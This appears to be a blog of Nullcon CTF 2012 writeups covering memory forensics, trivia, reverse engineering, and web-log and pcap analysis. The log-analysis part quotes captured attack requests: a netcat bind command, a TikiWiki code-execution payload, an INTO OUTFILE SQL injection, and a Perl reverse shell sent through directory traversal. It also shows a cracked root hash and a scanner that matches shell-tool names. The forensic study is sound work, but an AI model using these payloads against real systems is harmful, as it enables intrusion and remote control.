REG_SZ FriendlyName : (S) Seagate FreeAgent Go USB Device



Now the process part:
$ vol.py -f null.img pstree
Volatile Systems Volatility Framework 2.0
Name Pid PPid Thds Hnds Time
0x821C6A00:System 4 0 59 240 1970-01-01 00:00:00
. 0x81F5FB10:smss.exe 580 4 3 21 2012-01-06 12:39:37
.. 0x81FF92A0:csrss.exe 644 580 11 349 2012-01-06 12:39:38
.. 0x81FF8DA0:winlogon.exe 668 580 20 503 2012-01-06 12:39:38
... 0x81FE35D0:services.exe 712 668 15 258 2012-01-06 12:39:38
.... 0x81F84210:svchost.exe 1056 712 72 1193 2012-01-06 12:39:39
.... 0x81FE8620:svchost.exe 1212 712 14 204 2012-01-06 12:39:39
.... 0x81B73020:alg.exe 516 712 7 103 2012-01-06 12:39:49
.... 0x82018438:svchost.exe 968 712 10 227 2012-01-06 12:39:39
.... 0x82002530:svchost.exe 1176 712 5 58 2012-01-06 12:39:39
.... 0x81FA8AC0:svchost.exe 900 712 20 201 2012-01-06 12:39:38
.... 0x81F586F0:spoolsv.exe 1336 712 13 122 2012-01-06 12:39:39
... 0x81FEEBB8:lsass.exe 724 668 26 343 2012-01-06 12:39:38
0x81F7A428:explorer.exe 1584 1568 13 374 2012-01-06 12:39:40
. 0x81B941E0:nullcon.exe 484 1584 1 22 2012-01-06 12:40:07
.. 0x81BA3020:cmd.exe 320 484 1 28 2012-01-06 12:40:20
. 0x81B403A8:cmd.exe 1048 1584 1 31 2012-01-06 12:40:13
.. 0x81B7B020:win32dd.exe 856 1048 1 21 2012-01-06 12:40:30

We see that explorer.exe started nullcon.exe.

But explorer.exe does not seem to be the required file.

http://www.mandiant.com/products/free_software/memoryze/download
http://www.mandiant.com/products/free_software/mandiant_audit_viewer/download

We see nullcon.exe is started with the parameter C:\WINDOWS\system32\mshearts.exe

and it is calling:
C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\user\LOCALS~1\Temp\ztmp\tmp71989.bat C:\WINDOWS\system32\mshearts.exe

Expected format: "DD/MM/YYYY HH:MM:SS" (from the page source)

SerialNo.: 2GEL32TN
First mounted: 05/01/2012 18:54:36
Last mounted: 06/01/2012 17:52:13
Launched by: mshearts.exe







Nullcon CTF 2012 Trivia Writeup

Trivia 100



My first thought was Nucleus: it is related to TRON (1982) and it is a puzzle game.

But following the What_Evil_Lurks hint, it was at the end, on the cover.

Flag: Android

Trivia 200



This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying packets with malicious intent.

http://www.ietf.org/rfc/rfc3514.txt

The bit field is laid out as follows:

0
+-+
|E|
+-+


Flag: e

Trivia 300



This humorous RFC of the Internet Engineering Task Force describes a communication and control protocol suite designed for allowing infinite numbers of monkeys with infinite numbers of typewriters to produce the entire works of William Shakespeare.


Google: RFC infinite numbers of monkeys with infinite numbers of typewriters to produce the entire works of William Shakespeare

http://www.ietf.org/rfc/rfc2795.txt

Flag: 2795

Trivia 400

Metasploit was originally coded for what purpose?

This was pretty hard to identify. After googling for a long time you will find a lot of information about Metasploit, but this one has the solution inside:

https://www.blackhat.com/presentations/bh-dc-10/Moore_HD/BlackHat-DC-2010-Moore-Metasploit-and-Money-wp.pdf

"Since I was doing this for fun anyways, I decided to make a game out of it, the target network would become the "map", the "weapons" were the exploits, and points were scored when the player's specific agent was installed on the target systems."

The answer is: game

Trivia 500


Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds to compose commands.

Flag: whitespace



Getting the address of next instruction using INT 2E

During some reversing at the nullcon CTF I noticed that an INT 2E call loads the address of the next instruction into the EDX register.


Address Hex dump Command
0040103E |. 33C0 XOR EAX,EAX
00401040 |. 33D2 XOR EDX,EDX
00401042 |. 68 A141761D PUSH 1D7641A1
00401047 |. 68 BEBAADDE PUSH DEADBABE
0040104C |. 6A 00 PUSH 0
0040104E |. 6A 00 PUSH 0
00401050 |. 6A 00 PUSH 0
00401052 |. 6A 00 PUSH 0
00401054 |. 6A 00 PUSH 0
00401056 |. 6A 00 PUSH 0
00401058 |. 6A 00 PUSH 0
0040105A |. 6A 00 PUSH 0
0040105C |. 6A 00 PUSH 0
0040105E |. CD 2E INT 2E
00401060 |. 83C2 1A ADD EDX,1A
00401063 |. FFD2 CALL EDX


After calling INT 2E at 0040105E, EDX contains the address of the next instruction (00401060). The return value in EAX is 0xC0000005 (STATUS_ACCESS_VIOLATION), which means an access violation occurred.

Registers at 00401063:
EAX C0000005
ECX 0012FEDC
EDX 0040107A HackIM.0040107A
EBX 00000001
ESP 0012FEDC
EBP 0012FF30
ESI 00000000
EDI FFFFFFFE
EIP 00401063 HackIM.00401063

The INT 2E instruction is a call to KiSystemService, where EAX contains the service number and EDX a pointer to the arguments. The value in EAX is looked up in the KiServiceTable (Wiki entry for SSDT). I found a KiServiceTable dump on some forum here.
In our case EAX is 0 and it calls NtAcceptConnectPort.

For completeness, here are the registers before calling the INT 2E instruction and the stack before and after the call.
EAX 00000000
ECX 0000000A
EDX 00000000
EBX 00000001
ESP 0012FEDC
EBP 0012FF30
ESI 00000000
EDI FFFFFFFE
EIP 0040105E HackIM.0040105E
0012FEDC /00000000
0012FEE0 |00000000
0012FEE4 |00000000
0012FEE8 |00000000
0012FEEC |00000000
0012FEF0 |00000000
0012FEF4 |00000000
0012FEF8 |00000000
0012FEFC |00000000
0012FF00 |DEADBABE
0012FF04 |1D7641A1

Nullcon CTF 2012 Reverse Engineering Writeup

Reversing 1 justdoit.exe

The file is packed. There are no anti-debugging protections, so you can run it in OllyDbg.

If you start the application, it sends key-press events to press the Win key and arrow up to click on Run, then enters wplayer.exe to start Windows Media Player. Later it types the flag.

By setting a breakpoint at 0x004040A5 you will see the routine that calls this function.

Flag: We could talk all day about what AutoHotKey can do for an online poker player

Reversing 2

The binary itself was like a red herring. Some time later there was a hint pointing to the .rsrc section.

Then I just executed the code in the .rsrc section. It had 5 decryption routines, which you can see in the screenshot. After the last decryption EAX was pointing to the flag.



Flag: AreYouHappyNow?

Level 3: null Mobile Android App


We're proud to announce the null Mobile Android App Project, however the application is currently in Beta Phase and requires lot of attention from the testers.
In keeping with the spirit of HackIM we've hidden a Flag inside. Your task is to find the Flag

Extract the file and look into the files.
res/raw/code.js is a red herring.

View res/raw/junk.php; there is JavaScript inside.

Analyse/unpack this JavaScript and you will see there is a hidden function which holds the key:

function mikcah(a, b) {
    galf = "Do not let what you cannot do interfere with what you can do.";
}


Flag: Do not let what you cannot do interfere with what you can do.

Level 4

$ file script2
script2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, stripped
$ objdump -R script2

script2: file format elf64-x86-64

DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0000000000601fe0 R_X86_64_GLOB_DAT __gmon_start__
0000000000602ee0 R_X86_64_COPY __environ
0000000000602ee8 R_X86_64_COPY stderr
0000000000602000 R_X86_64_JUMP_SLOT getenv
0000000000602008 R_X86_64_JUMP_SLOT __errno_location
0000000000602010 R_X86_64_JUMP_SLOT getpid
0000000000602018 R_X86_64_JUMP_SLOT __stack_chk_fail
0000000000602020 R_X86_64_JUMP_SLOT __libc_start_main
0000000000602028 R_X86_64_JUMP_SLOT memcmp
0000000000602030 R_X86_64_JUMP_SLOT calloc
0000000000602038 R_X86_64_JUMP_SLOT putenv
0000000000602040 R_X86_64_JUMP_SLOT atoll
0000000000602048 R_X86_64_JUMP_SLOT fprintf
0000000000602050 R_X86_64_JUMP_SLOT time
0000000000602058 R_X86_64_JUMP_SLOT __xstat
0000000000602060 R_X86_64_JUMP_SLOT malloc
0000000000602068 R_X86_64_JUMP_SLOT __isoc99_sscanf
0000000000602070 R_X86_64_JUMP_SLOT execvp
0000000000602078 R_X86_64_JUMP_SLOT sprintf
0000000000602080 R_X86_64_JUMP_SLOT strdup
0000000000602088 R_X86_64_JUMP_SLOT strerror
$ ltrace ./script2
__libc_start_main(0x40147d, 1, 0x7fff1c8bd988, 0x401540, 0x4015d0
atoll(0x6020c0, 11, 0, 92, 0x7fdc0795f300) = 0x4f0f26a8
time(NULL) = 1327077060
__errno_location() = 0x7fdc07b626a8
__errno_location() = 0x7fdc07b626a8
fprintf(0x7fdc0795e860, "%s%s%s: %s\n", "./script2", "", "", "has expired!\nSeems the Devils Lu"..../script2: has expired!
Seems the Devils Luck prevails yet. Use Time Machine to overcome it
) = 92
+++ exited (status 1) +++

main is at 0x400f99; running it in gdb.

Some constants at the beginning:
gdb$ x/s 0x602ce0
0x602ce0: "has expired!\nSeems the Devils Luck prevails yet. Use Time Machine to overcome it"
gdb$ x/s 0x6020c0
0x6020c0: "1326393000"

First check to bypass:
if (_atoll("1326393000") < _time(0)) goto end
b *0x400ffd
Some vars after memcpy():

0x6020cd: "/bin/sh"
0x6020d5: "-c"
0x602ccf: "exec '%s' \"$@\""
0x602cdf: ""
0x602d71: "location has changed!"
0x602d42: "location has changed!"
0x602d71: "location has changed!"
0x602d5d: "abnormal behavior!"

0x604170: "exec '/path/to/script2' \"$@\""
b *0x4010ed for some check results from 0x400f99

0x602d89: ""
gdb$ x/s 0x602280
0x602280: "#!/bin/sh\n", '#' ...
0x602cb9: "shell has changed!"
0x602d8b: "shell has changed!"

gdb$ dump binary memory dump.raw 0x602280 0x602d00

dump.raw is a shell script, and here is the interesting part:

flagreq=0
if [ $flagreq -eq 1 ]
then
    echo "Nature has neither kernel nor shell; she is everything at once"
fi


Flag: Nature has neither kernel nor shell; she is everything at once

Level 5: Got Dumped :(

$ file lol.dmp
lol.dmp: MDMP crash report data
Some information extracted using Visual Studio:
Last Write Time: 08.01.2012 14:38:14
Process Name: Stub.exe : E:\Projects\Nullcon 2012\HackIM\RE2\Stub\Release\Stub.exe
OS Version: 5.1.2600

Modules:
Stub.exe E:\Projects\Nullcon 2012\HackIM\RE2\Stub\Release\Stub.exe 0.0.0.0
ntdll.dll C:\WINDOWS\system32\ntdll.dll 5.1.2600.5512
kernel32.dll C:\WINDOWS\system32\kernel32.dll 5.1.2600.5512
user32.dll C:\WINDOWS\system32\user32.dll 5.1.2600.5512
gdi32.dll C:\WINDOWS\system32\gdi32.dll 5.1.2600.5512

Stack:
> deadbabe()
Stub.exe!00401290()
[Frames below may be incorrect and/or missing, no symbols loaded for Stub.exe]
Stub.exe!00402921()
kernel32.dll!7c817067()

The asm code at 0x401000 before the crash:
push    ebp
mov ebp, esp
push 0FFFFFFFEh
push offset dword_409598
push offset sub_402730
mov eax, large fs:0
push eax
sub esp, 24h
mov eax, dword_40A004
xor [ebp-8], eax
xor eax, ebp
mov [ebp-28], eax
push ebx
push esi
push edi
push eax
lea eax, [ebp-16]
mov large fs:0, eax
mov [ebp-24], esp
mov eax, dword_409270
mov [ebp-48], eax
mov ecx, dword_409274
mov [ebp-44], ecx
mov edx, dword_409278
mov [ebp-40], edx
mov eax, dword_40927C
mov [ebp-36], eax
mov cx, word_409280
mov [ebp-32], cx
mov dl, byte_409282
mov [ebp-30], dl
push 0DEADBABEh
retn

This function prepares the stack this way (value, meaning):
deadbabe push deadbabe
e0442488 push eax - esp is pointing here
fffffffe push edi
00000000 push esi
00000001 push ebx
fffffffe uninitialized value -2

bc9398a4 *(409270)
a184818f *(409274)
82839b8f *(409278)
0000978f *(40927C)
00000000 *(409280)2bytes + *(409282) 2bytes
e0442488 0x0E056DBB8 xor ebp (0x12FF30)
0012feec (esp)
e0164840 uninitialized value 4093F8? // SEH is prepared here
0012ffb0 large fs:0 (pointer to next seh)
00402730 //Address to jump on exception like 0xdeadbabe
e0164e20 0x409598 xor 0x0E056DBB8 (*40A004) exception_handler_table
fffffffe

0012ffc0 saved ebp - ebp is pointing here
00401290 saved eip


After the crash the exception handler function @00402730 will be called.

The pushed value A49893BC8F8184A18F9B83828F97 looked like an encrypted flag to me.

At first I thought the exception handler had to be called, and the flag would then be decrypted and shown to the user.

If you scroll down a little you will notice this piece of code.

004010DA  /.  33F6          XOR ESI,ESI
...
004010F2 |> FE4435 D0 /INC BYTE PTR SS:[ESI+EBP-30]
...
00401106 |. 304435 D0 |XOR BYTE PTR SS:[ESI+EBP-30],AL
0040110A |. 46 |INC ESI
...
00401113 |.^ 7C DD \JL SHORT 004010F2
...
00401117 |. 68 84924000 PUSH OFFSET 00409284 ; Pointing to the string "Flag"



It looks like this is where the flag is decoded: every byte is incremented and then XORed with another byte. I guessed that it is always the same byte, so I wrote a simple brute-forcer in Python.

flag = "A49893BC8F8184A18F9B83828F97"

for key in range(256):
    out = ""
    for i in range(0, len(flag), 2):
        c = int(flag[i:i+2], 16) + 1   # INC BYTE PTR [ESI+EBP-30]
        out += chr((c ^ key) & 0xff)   # XOR with the guessed key byte
    print(out)


The output looked like this:
KwzS~lkL~rjm~v
Jv{RmjMsklw
UidM`ruR`lts`h
TheLastSamurai
WkfObpwPbnvqbj
VjgNcqvQcowpck
Qm`IdvqVdhpwdl


Flag: TheLastSamurai
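As an added example (not code from the original writeup), the same INC-then-XOR loop written as a decode function, with the key byte recovered two ways: from one known plaintext character, and by keeping only the keys whose output is fully printable ASCII. The known first letter 'T' used in the demo is an assumption taken from the brute-force output above.

```python
# Added example, not from the original writeup. Mirrors the loop at
# 0x4010F2..0x401113: INC every byte, then XOR it with one key byte.
import string

CIPHERTEXT_HEX = "A49893BC8F8184A18F9B83828F97"  # the 14 bytes pushed before 0xDEADBABE
PRINTABLE = set(string.ascii_letters + string.digits + string.punctuation + " ")

def decode(cipher_hex: str, key: int) -> str:
    """INC BYTE (wrapping at 8 bits), then XOR with the key byte, for every byte."""
    return "".join(chr(((b + 1) & 0xFF) ^ key) for b in bytes.fromhex(cipher_hex))

def key_from_known_char(cipher_hex: str, index: int, plain_char: str) -> int:
    """XOR is its own inverse: key = (c + 1) ^ p at any position whose plaintext is known."""
    c = bytes.fromhex(cipher_hex)[index]
    return ((c + 1) & 0xFF) ^ ord(plain_char)

def printable_candidates(cipher_hex: str) -> dict:
    """Try all 256 keys; keep only those whose output is entirely printable ASCII."""
    found = {}
    for key in range(256):
        text = decode(cipher_hex, key)
        if all(ch in PRINTABLE for ch in text):
            found[key] = text
    return found

if __name__ == "__main__":
    # Assumption for the demo: the first letter is 'T', as spotted in the brute-force output.
    key = key_from_known_char(CIPHERTEXT_HEX, 0, "T")
    print(f"key {key:#04x}: {decode(CIPHERTEXT_HEX, key)}")
    for k, text in sorted(printable_candidates(CIPHERTEXT_HEX).items()):
        print(f"{k:#04x} {text}")
```

The printable filter leaves only a handful of candidates (the neighbours of 0xF1 are the garbled lines shown above), so the flag stands out without reading all 256 outputs.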




For corrections and other feedback send me an e-mail to bashrc at intruded dot net

Dienstag, 17. Januar 2012

Nullcon 2012 Writeup on Log Analysis

The log analysis levels were straightforward, but maybe there are still some people who are interested in the solutions.

Level 1 (Analysing the Nikto report file)

You will quickly notice that there is a line containing the challenge path:
+ OSVDB-3268: GET /challenge/logically_insane/  : Directory indexing is enabled: /challenge/logically_insane/

After navigating to this folder, you will see a (fake) directory listing with askmelater.asp inside.

After navigating to this file and looking at the directory listing, you get the hint "Ask the proper question to get the proper answer" and the parameter information askmelater.asp?question=?

Using flag as the parameter you get the flag: 6bb61e3b7bce0931da574d19d1d82c88 (this value is generated, so your flag may be different)

Level 2 (Analysing the pcap file)

This was more about manually scrolling through the packets in Wireshark and looking at the contents. After reaching packet number 28, you see the response to a SELECT and the password ..Supp@..adm1n, which is the flag.

Level 3 (Analysing the 25M access log)

Some web scanner flooded the logs, so you cannot find anything by scrolling through them.
I just looked at the question: we need the attacker's IP, so I listed all IPs first.

$ cat access.log | awk '{print $1}' | sort | uniq
127.0.0.1
192.168.0.105
192.168.0.107
192.168.0.110


Afterwards I filtered by IP, hoping that the shortest log would have the answer.

$ cat access.log | grep 192.168.0.107
192.168.0.107 - - [] "GET /index.php HTTP/1.1" 200 1364
192.168.0.107 - - [] "GET /javascript/jquery.js HTTP/1.1"
192.168.0.107 - - [] "GET /javascript/common.js HTTP/1.1"
192.168.0.107 - - [] "GET /Contacts.php HTTP/1.1"
192.168.0.107 - - [] "GET /add-contact.php HTTP/1.1"
192.168.0.107 - - [] "GET /search.php HTTP/1.1"
192.168.0.107 - - [] "GET /search.php HTTP/1.1"
192.168.0.107 - - [06/Jan/2012:00:58:00 +0530] "GET /contact.php?c=bmMgLWwgLXAgNjY2Ng== HTTP/1.1" 500 274 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"


And indeed, the answer is inside the shortest log.

base64decode("bmMgLWwgLXAgNjY2Ng==") == nc -l -p 6666

The attacker is coming from 192.168.0.107 and uses contact.php to start netcat on port 6666.

Level 4 (Analysing the Burp session log)

Unfortunately I don't have a full version of Burp, so I couldn't load the log file into the application.

As in level 3, I tried to identify the attacker first by sorting on a unique attribute. I arbitrarily chose the User-Agent for this.

$ cat burp.log | grep User-Agent | sort | uniq
User-Agent: Internet Explorer 6.0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1


IE6 is running, so I thought this could be a client-side exploit. After manually looking into the file using vi, I recognized that there is a command execution.

POST /tikiwiki/scripts/server.php HTTP/1.1^M
TE: deflate,gzip;q=0.3^M
Connection: TE, close^M
Host: 192.168.221.154^M
User-Agent: Internet Explorer 6.0^M
Content-Length: 360^M
^M
foo.bar1111','')); system('id
'); die; /*



I googled for "tikiwiki server.php code execution" and found the CVE number.
Flag: CVE-2005-1921

Level 5 (Analysing the 93M pcapng file)

We have to find 4 flags this time.
Flag-I: Vulnerable Parameter in 1st Attack
Flag-II: Vulnerable Parameter in 2nd Attack
Flag-III: Names of the people who discovered the Local Privilege Escalation Exploit used
Flag-IV: root Password


I started with the last part: somebody uses local root exploits, so there should be traces of this.

$ strings dump.pcapng | grep root
...
root:$1$IW2CPQzs$ba/aJ9zePc/r9tF2R6KAJ0:15350:0:99999:7:::
...
** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)
ggcc 9479.c -o root
./root
uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
...


The sock_sendpage() exploit can be found quickly on exploit-db, where you can see the line "Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team."

Flag III is found; now search for the others.

Guessing it is a web exploit, I grepped for "GET" and found the following lines.

GET /index.html?page=blog&title=Blog&id=2+AND+1=2+UNION+ALL+SELECT+1,'',3,4,5+INTO+OUTFILE '/tmp/test2.txt'--+- HTTP/1.1

GET /index.html?page=../../../../../../../../../tmp/test2.txt&c=perl -e 'use Socket;$i="192.168.221.130";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


What can we see here?
The first request is an SQL injection writing the line "" into the file "/tmp/test2.txt".

The second request uses a directory traversal bug to execute the test2.txt file, which in turn runs the perl connect-back shell.

We see that the attacker has the IP 192.168.221.130 and listens on port 4444.

Our first flag is id and the second one is page.
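As an added example (not part of the writeup), here is a small Python scanner that flags the three request patterns seen in Level 3 and Level 5 above: a base64-encoded command in a query parameter, a UNION ... INTO OUTFILE injection, and ../ traversal combined with an interpreter name in a parameter. The sample log lines are constructed from the requests quoted above; the timestamp and response sizes are placeholders.

```python
# Added example, not from the original writeup: a scanner for the request
# patterns seen in Level 3 (base64-encoded nc command in a parameter) and
# Level 5 (UNION ... INTO OUTFILE, then ../ traversal with a perl reverse
# shell in a parameter). Sample lines are constructed; timestamp/sizes are placeholders.
import base64, binascii, re
from urllib.parse import unquote_plus, urlsplit

SAMPLE_LOG = """\
192.168.0.107 - - [06/Jan/2012:00:58:00 +0530] "GET /index.php HTTP/1.1" 200 1364
192.168.0.107 - - [06/Jan/2012:00:58:00 +0530] "GET /contact.php?c=bmMgLWwgLXAgNjY2Ng== HTTP/1.1" 500 274
GET /index.html?page=blog&title=Blog&id=2+AND+1=2+UNION+ALL+SELECT+1,'',3,4,5+INTO+OUTFILE '/tmp/test2.txt'--+- HTTP/1.1
GET /index.html?page=../../../../../../../../../tmp/test2.txt&c=perl -e 'use Socket;$i="192.168.221.130";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
"""

IP_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}) ")
REQ_RE = re.compile(r"(?:GET|POST|HEAD) (.+?)(?: HTTP/\d\.\d|$)")
SQLI_RE = re.compile(r"(?i)\bunion\b.+\bselect\b|\binto\s+outfile\b")
COMMAND_RE = re.compile(r"(?:^|\s)(?:nc|sh|bash|perl|python|wget|curl)\b")  # tool as a word

def try_base64(value: str) -> str:
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return ""
    return text if text.isprintable() else ""  # '' means "not base64-encoded text"

def scan_line(line: str) -> list:
    """Indicators found in one access-log line or raw request line."""
    m = REQ_RE.search(line)
    if not m:
        return []
    raw_query = urlsplit(m.group(1)).query
    query = unquote_plus(raw_query)
    findings = []
    if SQLI_RE.search(query):
        findings.append("sqli")
    if "../" in query:
        findings.append("traversal")
    for part in raw_query.split("&"):  # split the raw query: '+' may belong to base64
        if "=" in part:
            raw_value = part.split("=", 1)[1]
            for text in (unquote_plus(raw_value), try_base64(raw_value)):
                if hit := COMMAND_RE.search(text):  # plain value, then its base64 decoding
                    findings.append("command:" + hit.group(0).strip())
    return findings

def scan_log(text: str) -> list:
    """(client IP or '?', findings) for each line that has findings."""
    hits = [(IP_RE.match(ln), scan_line(ln)) for ln in text.splitlines()]
    return [(m.group(1) if m else "?", f) for m, f in hits if f]
```

On the constructed sample, scan_log tags the contact.php request from 192.168.0.107 with command:nc (from the base64 decoding), the UNION request with sqli, and the traversal request with traversal and command:perl, while the plain index.php request produces nothing.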

I loaded the pcapng file into Wireshark and set the filter "ip.addr==192.168.221.130 && tcp.port==4444".

The full shell log can be found here.

I couldn't find the root password inside the network dump, so I started john.
$ john nullcon.tmp
Loaded 1 password hash (FreeBSD MD5 [32/64 X2])

After some time: zuzana



